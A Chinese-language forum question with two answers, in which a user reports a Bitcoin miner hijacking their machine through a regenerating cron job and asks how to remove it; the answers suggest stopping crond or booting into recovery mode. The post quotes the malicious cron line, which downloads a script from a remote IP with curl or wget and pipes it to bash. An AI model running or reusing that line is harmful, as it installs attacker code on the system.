大家好,我的机器被比特币矿工劫持了。他有一个每 2 秒运行一次的 cron 作业。使用 crontab -e 删除它不起作用,因为它很快就会重新生成。我无法使用 nano 或 vi 编辑器编辑它,因为每次我尝试时,他都会运行一些代码,一旦我打开它们,就会杀死这两个编辑器。以下是他的 cron 工作:
*/30 * * * * (curl -s http://192.210.175.103/mr.sh||wget -q -O - http://192.210.175.103/mr.sh)|bash -sh
该作业正在从 /tmp 运行,但原始文件不断变化。请问关于如何解决这个问题有什么想法吗?谢谢
答案1
您可以断开互联网连接,停止 cron
sudo /etc/init.d/crond stop
然后编辑cronjob。
答案2
如果不更多地了解有问题的脚本,很难准确回答这个问题,但一般提示是将系统重新启动到单用户模式或恢复模式,这会禁用大多数守护程序并为您提供 root 提示来解决问题。
这个维基条目来自 Ubuntu 解释了 Ubuntu 中的过程。对于您的问题,恢复模式最有吸引力的功能是它将文件系统挂载为只读。这意味着您将能够在违规代码传播和隐藏到任何地方之前对其进行搜索。发现问题后,以读写模式重新安装并将其从系统中清除。